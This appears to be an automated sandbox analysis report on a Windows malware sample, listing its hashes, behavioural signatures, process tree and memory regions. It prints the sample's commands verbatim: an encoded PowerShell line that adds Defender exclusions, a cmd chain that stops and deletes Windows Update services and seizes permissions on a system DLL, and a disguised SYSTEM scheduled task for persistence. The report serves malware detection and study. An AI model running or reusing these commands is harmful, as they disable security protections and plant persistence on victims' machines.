Analysis
-
max time kernel
31s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
17-03-2023 07:57
Static task
static1
Behavioral task
behavioral1
Sample
fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe
Resource
win7-20230220-en
General
-
Target
fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe
-
Size
4.3MB
-
MD5
ccaffcd12dcb30adb5250f30026ecd1e
-
SHA1
4048dc71db497f641a4f35eb00ac3c163c394978
-
SHA256
fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa
-
SHA512
a196e58aaff3f68e15df0de667541d103c78d0f8cf114ff3f5770444de1a30b0dc46c4d0dcafbc8bd81538660d401c57dc18de8b6b3769b81cc4e8ff7f316286
-
SSDEEP
98304:w1XNI4kmUg+DgxP1Wrj3DIIs0LHhjwSKVjV3:w9NInmUg5xqX/sCHhj7K5p
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 1712 takeown.exe 636 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 1712 takeown.exe 636 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directory 2 IoCs
Processes:
conhost.exedescription ioc process File created C:\Program Files\Windows\services.exe conhost.exe File opened for modification C:\Program Files\Windows\services.exe conhost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1992 sc.exe 584 sc.exe 2032 sc.exe 1256 sc.exe 1328 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1404 reg.exe 1836 reg.exe 812 reg.exe 1608 reg.exe 1572 reg.exe 932 reg.exe 1536 reg.exe 1840 reg.exe 1296 reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.execonhost.exepid process 1516 powershell.exe 2044 conhost.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.execonhost.exetakeown.exedescription pid process Token: SeDebugPrivilege 1516 powershell.exe Token: SeDebugPrivilege 2044 conhost.exe Token: SeTakeOwnershipPrivilege 1712 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.execonhost.execmd.execmd.execmd.exedescription pid process target process PID 1324 wrote to memory of 2044 1324 fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe conhost.exe PID 1324 wrote to memory of 2044 1324 fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe conhost.exe PID 1324 wrote to memory of 2044 1324 fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe conhost.exe PID 1324 wrote to memory of 2044 1324 fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe conhost.exe PID 2044 wrote to memory of 1988 2044 conhost.exe cmd.exe PID 2044 wrote to memory of 1988 2044 conhost.exe cmd.exe PID 2044 wrote to memory of 1988 2044 conhost.exe cmd.exe PID 1988 wrote to memory of 1516 1988 cmd.exe powershell.exe PID 1988 wrote to memory of 1516 1988 cmd.exe powershell.exe PID 1988 wrote to memory of 1516 1988 cmd.exe powershell.exe PID 2044 wrote to memory of 1796 2044 conhost.exe cmd.exe PID 2044 wrote to memory of 1796 2044 conhost.exe cmd.exe PID 2044 wrote to memory of 1796 2044 conhost.exe cmd.exe PID 1796 wrote to memory of 1992 1796 cmd.exe sc.exe PID 1796 wrote to memory of 1992 1796 cmd.exe sc.exe PID 1796 wrote to memory of 1992 1796 cmd.exe sc.exe PID 1796 wrote to memory of 584 1796 cmd.exe sc.exe PID 1796 wrote to memory of 584 1796 cmd.exe sc.exe PID 1796 wrote to memory of 584 1796 cmd.exe sc.exe PID 1796 wrote to memory of 2032 1796 cmd.exe sc.exe PID 1796 wrote to memory of 2032 1796 cmd.exe sc.exe PID 1796 wrote to memory of 2032 1796 cmd.exe sc.exe PID 1796 wrote to memory of 1256 1796 cmd.exe sc.exe PID 1796 wrote to memory of 1256 1796 cmd.exe sc.exe PID 1796 wrote to memory of 1256 1796 cmd.exe sc.exe PID 1796 wrote to memory of 1328 1796 cmd.exe sc.exe PID 1796 wrote to memory of 1328 1796 cmd.exe sc.exe PID 1796 wrote to memory of 1328 1796 cmd.exe sc.exe PID 1796 wrote to memory of 1608 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1608 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1608 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1572 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1572 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1572 1796 cmd.exe reg.exe PID 1796 wrote to memory of 932 1796 cmd.exe reg.exe PID 1796 wrote to memory of 932 1796 cmd.exe reg.exe PID 1796 wrote to memory of 932 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1536 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1536 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1536 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1404 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1404 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1404 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1712 1796 cmd.exe takeown.exe PID 1796 wrote to memory of 1712 1796 cmd.exe takeown.exe PID 1796 wrote to memory of 1712 1796 cmd.exe takeown.exe PID 1796 wrote to memory of 636 1796 cmd.exe icacls.exe PID 1796 wrote to memory of 636 1796 cmd.exe icacls.exe PID 1796 wrote to memory of 636 1796 cmd.exe icacls.exe PID 2044 wrote to memory of 1668 2044 conhost.exe cmd.exe PID 2044 wrote to memory of 1668 2044 conhost.exe cmd.exe PID 2044 wrote to memory of 1668 2044 conhost.exe cmd.exe PID 1668 wrote to memory of 1284 1668 cmd.exe schtasks.exe PID 1668 wrote to memory of 1284 1668 cmd.exe schtasks.exe PID 1668 wrote to memory of 1284 1668 cmd.exe schtasks.exe PID 1796 wrote to memory of 1840 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1840 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1840 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1836 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1836 1796 cmd.exe reg.exe PID 1796 wrote to memory of 1836 1796 cmd.exe reg.exe PID 1796 wrote to memory of 812 1796 cmd.exe reg.exe PID 1796 wrote to memory of 812 1796 cmd.exe reg.exe PID 1796 wrote to memory of 812 1796 cmd.exe reg.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe"C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa.exe"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAbgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZwAjAD4A"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {3488D7F6-801B-4CF5-8293-44D194216BC3} S-1-5-18:NT AUTHORITY\System:Service:1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1516-62-0x000000001B470000-0x000000001B752000-memory.dmpFilesize
2.9MB
-
memory/1516-63-0x0000000002420000-0x0000000002428000-memory.dmpFilesize
32KB
-
memory/1516-64-0x0000000002574000-0x0000000002577000-memory.dmpFilesize
12KB
-
memory/1516-65-0x000000000257B000-0x00000000025B2000-memory.dmpFilesize
220KB
-
memory/2044-54-0x0000000000160000-0x000000000057C000-memory.dmpFilesize
4.1MB
-
memory/2044-55-0x000000001BA20000-0x000000001BE3C000-memory.dmpFilesize
4.1MB
-
memory/2044-56-0x000000001B580000-0x000000001B600000-memory.dmpFilesize
512KB
-
memory/2044-57-0x000000001B580000-0x000000001B600000-memory.dmpFilesize
512KB